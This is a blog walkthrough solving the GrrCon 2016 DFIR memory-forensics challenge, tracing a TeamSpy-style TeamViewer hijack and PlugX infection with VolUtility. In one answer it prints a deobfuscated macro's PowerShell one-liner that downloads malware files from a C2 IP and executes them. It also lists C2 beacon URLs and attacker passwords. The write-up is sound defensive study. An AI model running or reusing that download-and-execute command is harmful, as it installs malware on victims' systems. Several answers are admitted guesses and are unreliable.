Solving GrrCon 2016 DFIR Challenge

      6 Comments on Solving GrrCon 2016 DFIR Challenge

It’s that time of year again and Wyatt Roersma has released the 2016 GrrCon DFIR Challenge. At the time of writing it’s still available to register and download the images from https://ir.e-corp.biz.

Once again as these are memory images I am going to try to solve the challenge solely using VolUtility. Word of warning I reveal all the answers :p

For the answers I try to show you some of the process I go through, some of the wrong turns I make and the lessons I learned. However there are some questions where I will take you straight to the right answer if I was to cover every thought process I undertook and every wrong turn I made this would be a much longer post. (And it’s already pretty long).

Setup

I start with a Vanilla build of VolUtilty using the install guide on the wiki to get me going. I create a config file that contains my VirusTotal API key and set my usual list of plugins to run as soon as the session has been loaded.

  • pslist,psscan,netscan,cmdline,cmdscan,procdump,filescan,imageinfo

This time i can bulk load all (2) of the images in one go. It doesn’t take long before the images are ready for use, whilst my autorun plugins process away in the background.

Just tick the ‘Recursively add from Directory’ Tick box when adding a new session.

grrcon_2016_img_load

With the images ready on with the questions.

On this fresh Thursday morning E Corp has contacted you to help them with their current incident response.

The CEO Phillip Price has requested that the use of any means necessary to catch the actors that released their secret plans with the government to back door the E Coin payment processing system for unlimited monitoring. The stock price has fallen by 50% since the leak by “guccifer 2.0” revealing emails between the CEO and the CTO about the plans. The IR team has acquired live response from the CEO’s system that showed “strange signs of infection” from his system for your expert analysis. PCAPs of the last few days have also been provided for additional context.

Question One (win7ecorpoffice2010-36b02ed3.vmem – 7i2wfWOO)

First lets find out what started the shit storm on his computer! What is the c2 address of the malware? (this case involves the host IP 10.1.1.122 of Phillip Price)

The challenge provides you with an extract of all the logs from a Security Onion instance that was running at the time i wanted to do all of this in memory. So first i used NETSCAN to identify which image had the local IP address 10.1.1.122. This was the win7ecorpoffice2010-36b02ed3.vmem

While we have NETSCAN open we can look for our answer. I start by looking for all ForeignAddr IP’s This gives me a handful and the one that jumps out immediately are a trio of connections from SkypeC2AutoUpd

The closed connection from -:0 to 120.122.236.3:0 is most likely not a valid data structure. No local address and port 0.

Answer: 54.174.131.235

Question Two

What is the User Agent string of the malware?

There are a couple of ways we can get this information. If the malware is making http requests its got to have this information in its process memory. Open the PSLIST plugin, filter for the skype process and then right-click export process memory.

grrcon_2016_q1_a

After a short time the spinner should disappear and we can check for our data under the MEMDUMP plugin output.

From the MEMDUMP plugin output select ‘File Details’ in the row that matches our file.

From here we can select the strings tab, extract the strings then download and open them in you editor of choice. I used the IP Address from question one as my first search and found the answer within the first couple of hits.

grrcon_2016_q2_b

 

Answer: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36

Question Three

What is the AV common name for the delivered malware? (Case doesn’t matter some times there is more than one name used by av vendors so try alt names if you’re sure or message me) Example: darkrat

I’m not sure how i actually got the answer for this. After the portal kept telling me i got the answer wrong I would log back in a day later to find it marked as correct.

For me getting the common name is done by submitting the sample to VT and looking at the vendor names. In VolUtility we can get the file by either dumping all Processes with DUMPPROC or we can check SCANFILES and save the file from the context menu there.

grrcon_2016_q3_a

Once we have the file we use the VirusTotal extension from the file details page and check our results. In this case there were no vendor detection’s on the file.

Turns out this seems to be a valid TeamViewer executable that has been renamed. There is a piece of malware that hijacks TeamViewer called TeamSpy. After reading a bit more about teamspy, you could identify if teamspy was installed by looking for the presence of a avicap32.dll in the same Dir as the executable file. This DLL is loaded using Search Order Hijacking.

I run FILESCAN and DLLDUMP to look for the presence of this file and find it in the temp dir which is the same as the SkypeC2AutoUpdate.exe

I follow a similar process with this DLL file. Extract the file from FILESCAN then use the VirusTotal extension under DUMPFILES and File Details. to get common names.

grrcon_2016_q3_b

This didn’t help much and as I said I’m not sure how I answered this correctly. If you know please let me know in the comments below.

Answer: TeamSpy?

Question Four

What is the malware version?

This one threw me for a while I was putting version numbers from every executable I could find that looked like it was malware. It wasn’t until I was answering another question that I found the answer to this one.

Looking in the strings for the process memory I found the following HTTP POST string that contained the answer I was looking for.

/getinfo.php?id=528812561&stat=1&tout=10
=2&osv=6.1&osbd=7600&ossp=0.0&ulv=2&elv=0&rad=0&agp=1&devicea=0&devicev=0&uname=phillip.price&cname=WIN-191HVE3KTLO&vpn=0&tvrv=0.2.2.2

 Answer: 0.2.2.2

Question Five

What is the password the malware used to enable remote access to the system?

I actually found this answer at the same time as Q2 where I found the UserAgent.  I found it in what appears to be a configuration block for the malware.

grrcon_2016_q5_a

Answer: P59fS93m

Question Six

What was the sender email address that delivered the phishing email?

These Email questions were an absolute pain and it prompted me to modify a small section of VolUtility and to create a new extension.

Outlook.exe is an open process so i can dump strings from the running process and check for emails in there. This is similar to what I did for the GrrCon 2015 challenge. There is however a better way. When Outlook is loaded, so are the PST files. These contain all the information I could possibly need.

I used the FILESCAN  and the store file context menu option to save all. No matter what I tried I couldn’t get a PST file that would parse correctly. Turns out there is an option with the Volatility DUMPFILES plugin that helps. This is the ‘unsafe’ option. I have modified the dumpfiles method in VolUtility to always use the unsafe option by default.

I have also added the option to find and save files by regex from the WebUI.

grrcon_2016_q6_a

Once you have the PST files stored in the VolUtility database using either method you can download them and parse them with something like pffexport. Some PST files will be more ‘complete’ than others but eventually you will find an email that looks suspicious.

grrcon_2016_q6_b

You may notice that the emails are being displayed inside the VolUtility interface. If you check out the develop branch of VolUtility you will find the initial extension that adds libpff support to the interface. To get here just select PST Viewer from the file details page.

Answer: karenmiles@t-online.de

Question Seven

What is the MD5 hash of the maldoc?

This is where it was even more important to use that unsafe option. Without it i could not get a valid attachment to fall out of pffexport.

We use the same method as question 7 run pff export against the PST file we carved out and look for the email and its attachment.

We find bank_statement_088452.doc at which point it’s a simple download and md5sum. 

Answer: c2dbf24a0dc7276a71dd0824647535c9

Question Eight

What is the ID given to the system by the malware for remote access? (9 digit number no spaces assigned to the remote access tool)

Again this is one we already have the answer for in the strings output for SkypeC2AutoUpdate.exe

The same HTTP POST data that gave us the version number also gives us the ID

/getinfo.php?id=528812561&stat=1&tout=10
=2&osv=6.1&osbd=7600&ossp=0.0&ulv=2&elv=0&rad=0&agp=1&devicea=0&devicev=0&uname=phillip.price&cname=WIN-191HVE3KTLO&vpn=0&tvrv=0.2.2.2

Using this ID as a pivot point also reveals some other potentially interesting information.

  • CT.Receive.CMD_DISCONNECT From=337037534 To=528812561 L=4
  • CmdPingRouter(): Router Pong Received with following Hops: 528812561 167491575
  • ttp://www.teamviewer.com/ru/licensing/update.aspx?id=528812561&ic=1239368&pid=noncommdialog

Answer: 528812561

Question Nine

What is the IPv4 address the actor last connected to the system with the remote access tool?

I got this one purely by process of elimination. I was looking for teamviewer logs that would show the last connection. It’s supposed to look something like this:

CT.Receive.CMD_UDPPING From=932536226 To=316426335 L=80
GWT.CmdUDPPing.PunchReceived, a=192.168.1.100, p=1565

I could find some partial logs in memory but they didn’t contain any IP’s and there was nothing in a memory mapped file.

I used a regex to pull all ‘IP’s’ from the process memory and tried them one at a time. Eventually I got it flagged as correct with the IP 31.6.13.155

Now I had the answer I wanted to find out how you should get to the answer. I couldn’t figure it out. I ran almost every plugin, pulled strings, grepped the raw memory and I could only find it a twice in seemingly random data.

Answer: 31.6.13.155

Question Ten

What is the PID the malware is running under?

Easy we had this from the beginning PSLIST for SkypeC2AutoUpdate.exe

Answer: 1364

Question Eleven

What is the bit coin wallet # that a ransom was demanded for?

This one is back to the PST. Looking through the emails we can see one talking about a ransom to prevent a DDOS attack.

grrcon_2016_q11_a

Answer: 25UMDkGKBe484WSj5Qd8DhK6xkMUzQFydY

Question Twelve

What macro execution method does this document use?

We have the document from an earlier question so now its just a matter of extracting the macro and analysing it.

I have spent a lot of time in my day job extracting macros from office documents so last year I stood up a small web service that automates the process for you. This service makes use of the excellent oletools kit by @declage2 and can be found at https://macro.malwareconfig.com

Simply upload your document and then download the resulting text file that contains all the macro code.

grrcon_2016_q12_a

Looking at the macro it is horribly obfuscated. Thankfully for this question at least we are just looking at execution flow so we don’t need to fully understand whats going on.

I started looking for the normal AutoExec methods but even oletools had not found anything.

I started looking through the code to find the ‘First’ function call that doesn’t have a call of its own.

Turns out its right at the top. Public Sub Img_Painted This sub calls another sub which eventually starts the infection process starting. But is never called itself. As this is the right at the top of execution flow it must be the one that starts the whole process.

Img_Painted is part of the ‘Painted Event’ ActiveX control- https://msdn.microsoft.com/en-us/library/aa510893.aspx?f=255&MSPPError=-2147217396

Answer: Img_Painted

Question Thirteen

What is the last Teamviewer account name the attacker uses?

Once again back to the strings output from the SkypeC2AutoUpdate.exe process.

As I was looking through the strings to identify the ID from Question Eight i had searched for the TeamViewer ID which is in the format (ddd ddd ddd)

I found this along with a weird name

  • fuckyourbears (337 037 534)

This is our answer:

Answer fuckyourbears

Question Fourteen

What file got stolen that was used in the leak of the secret backdoor project? (the data stolen actually contains information about planting a backdoor for government monitoring that was only ever communicated over email)

Another one I got without actually knowing how i got it! It was talking about emails so i spent a lot of time looking for emails, or documents that made reference to stolen data.

I couldn’t find anything I had a random thought that maybe they had exfiled the PST files as they would contain emails and it says they were only ever in emails.

outlook.pst was the answer that was accepted and I don’t know why. After this answer was marked as correct I tried to export the PST files and see what was inside that would have pointed me in the right direction but as far as I can tell outlook.pst files are all essentially empty.

If you know what I am missing here please let me know.

Question Fifteen

What Public Function in the word document returns the full command string that is eventually run on the system

OK looks like we have to deobfuscate the macro after all. As I said in the previous macro question i have spent a lot of time in my day job doing this so some of this is more obvious to me than it may be for you.

Looking through the macro code you see lots of random strings that are passed to a single function a.

grrcon_2016_q15_a

This is where all the important bits of information are. This is a typically obfuscation technique. A function that converts characters to integers runs some kind of XOR / mathematical routine before turning the resulting integer back in to a character.

I used to try converting the maths in to python but that math was slightly different every time and this proved to be more time-consuming.

Then i remember one of my favorite sites for analysing DOT NET malware. https://dotnetfiddle.net/ This site allows you to copy in code including VB and execute it in real-time. This is far easier than trying to convert to python or just executing the macro in a sandbox. This way I don’t need a sandbox.

I copy out the functions that form the obfuscation routine. Starting with a() Then its just a matter of copying and pasting dependent functions as required.

The result is something like this – https://dotnetfiddle.net/YNtLOZ

grrcon_2016_q13_a

I added a Console.WriteLine(a) in to the decode routine to print out the clear text and then its just a matter of copying in each of the encoded strings and running the fiddle.

I can see the powershell line that called and the base64 string comes back as

foreach ($i in @("SkypeC2AutoUpdate.exe","TeamViewer_Desktop.exe","TeamViewer_Resource_en.dll","avicap32.dll","tv_w32.dll","tv_w32.exe","tv_x64.dll","tv_x64.exe","tvr.cfg","vpn.exe")){(New-Object System.Net.WebClient).DownloadFile("http://54.174.131.235/files/$i", "$env:temp/$i")};Start-Process -FilePath "$env:TEMP/SkypeC2AutoUpdate.exe" -WorkingDirectory "$env:TEMP"

This seems to be the command string and this was found in the function UsoJar()

Answer: UsoJar

Question Sixteen (ecorpwin7-e73257c4.vmem – 1X6IW0yD)

What is the maldoc md5hash?

I started using the same method as I had with the previous level. Trying to extract from the PST. With or without the unsafe flag I couldn’t get the attachment hash to match the answer. There was chuck of random data sat in the middle of the file when trying to extract. I could get this cleaned enough to run, but not enough to get the correct MD5.

I checked to see if the file was mapped in memory. It was so I used the same method as normal to save this file. Right click context menu from FILESCAN.grrcon_2016_q16_a

This didn’t give me the right answer at first, I opened the file in a hex editor to check the content and noticed a lot of trailing null bytes (\x00) After trimming all of these away and using md5sum I had the correct answer.

Answer: 00e4136876bf4c1069ab9c4fe40ed56f

Question Seventeen

What is the common name of the malware that gets loaded?

We need to find the malware in order to answer this. There were no processes that jumped out as being nasty and nothing listed in MALFIND. NETSCAN showed a handful of connections to an IP address on port 80. Seems like a good place to start.

grrcon_2016_q17_a

The CMDLINE plugin shows the command line that was used to start each process on the box. This is incredibly useful for identifying how DLL files and services were started. This example is no exception.

grrcon_2016_q17_b

With the name of the file I run FILESCAN to see if the file exists in memory. It does so I Store the file object using the context menu and scan the file with the VirusTotal Extension.

grrcon_2016_q17_c

Common name seems to be korplug which a quick google will reveal is the alternative name for the PlugX family of malware.

Answer: PlugX

Question Eighteen

What password does the attacker use to stage the compressed file for exfil?

Once a box is infected it’s typically command line tools that are used for post exploitation actions. One of my favorite places to look for this kind of acticvity, after checking cmdscan and commandlines, is in the strings of conhost.exe

I dump the process memory and process the strings. I’m looking for compressed files so I start with a search for .rar. I get a couple of hits and my answer is there as well.

grrcon_2016_q18_a

Answer: password1234

Question Nineteen

What is the IP address of the c2 server for the malware?

We identified this when we located the malware svchost connectiung out to 52.90.110.169

Answer: 52.90.110.169

Question Twenty

What email address sent the phishing email?

We had this earlier when we were looking for the maldoc. It’s the only email that contains an attachment. We can dump the PST using any of the methods described earlier and run the PST through a parser like pffexport or if you using the develop branch of  VolUtility just open the PST Viewer tab from the file details page to get the answer.

Answer:  lloydchung@allsafecybersec.com

Question Twenty One

What is the name of the deb package the attacker staged to infect the E Coin Servers? (Include the full path of the package)

As with question 18 I’m expecting this level of infiltration to be from the command line, so I look in the strings output from conhost and search for .deb.

This reveals my answer

grrcon_2016_q21_a

Answer: files.allsafecybersec.com/av/linuxav.deb

Well that concludes another GrrCon Memory Challenge. I always enjoy these, I learn a lot and it drives me to keep developing tools.

There were a couple of things I didn’t like in a couple of the questions, and the order of the questions didn’t feel natural. For example the macro questions were not together, and the email questions were not all together.

Other than that I thoroughly enjoyed the challenge and I look forward to the next one :)

As usual Question, Queries, Comments below.

 

  • Pingback: Week 43 – 2016 – This Week In 4n6()

  • Pingback: Solving GrrCon 2016 Forensics Challenge – sec.uno()

  • Kyle Hanslovan

    Curious why 54.174.131.235 showed up as a “ForeignAddr”? Looks a lot like AWS US East (N. Virginia) to me.

    • Kevin Breen

      ForeignAddr is just how volatility displays the remote host. The IP Country name is a custom extension i added that uses the maxmind GeoIP City database. So its only as accurate as the time it was run. Hope this explains

      • Kyle Hanslovan

        Awesome, thanks for the clarification!

  • 8iggy

    Q12. i thought the reason would be in question, they said “it was only ever communicated over email”. so, as leaking information about backdoor, actor had to steal email content. as you know pst file is package of outlook emails. in conclusion, as this scenario only dealt with outlook mail, flag would be outlook.pst
    thank you for good write up ‘-^